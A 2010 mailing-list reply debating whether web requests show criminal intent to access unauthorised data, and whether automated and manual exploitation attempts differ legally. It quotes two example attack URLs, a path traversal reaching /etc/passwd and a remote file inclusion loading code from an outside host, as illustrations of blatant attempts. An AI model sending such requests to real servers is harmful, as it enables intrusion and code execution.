Being safe on the internet (was Re: Here we go again - ISP DPI, but is it interception?)

[Jon Ribbens]

On Thu, Aug 05, 2010 at 08:14:00AM +0100, James Firth wrote:
> Jon Ribbens wrote:
> > Personally, I think that (attempting to) access http://example.com/
> > or http://example.com/../ shows little-to-no evidence of knowingly
> > attempting to access unauthorised data. If however, as is seen
> > commonly, someone attempts to access something like
> > http://example.com/../../../etc/passwd or
> > http://example.com/index.php?include=http://1.2.3.4/hax0r.inc
> > or similar, then the user is quite blatantly attempting unauthorised
> > access and can most certainly be regarded as a criminal.
> 
> I see attacks on my servers on a daily basis - literally.

Yes, this is what I meant by "seen commonly" ;-)

> As you perhaps hinted the intent can best be shown through a sustained
> attack, and this in probably all cases is script driven.

Yes, clearly the volume scattergun attacks are automated.

> So - a machine-driven attack containing hundreds and usually thousands of
> requests across various known vulnerabilities is a clear line.
> Unfortunately such attacks usually come from compromised machines, although
> I'm possibly in breach of the law even going back to the source IP to
> establish whether it's been compromised using any well-known method.

I would think you might be.

> In my view attempting to exploit any one or more of the vulnerabilities "by
> hand" using mainstream commercial tools should not be actionable.

Sorry, you think it should be illegal if automated but legal if done
manually? How do you come to that conclusion? If the prosecution can
show that a person deliberately attempted to fetch one of the latter
two URLs I gave above, there can honestly be no reasonable doubt that
they were attempting something they knew was unauthorised, and I don't
see any particular reason that that should not be illegal.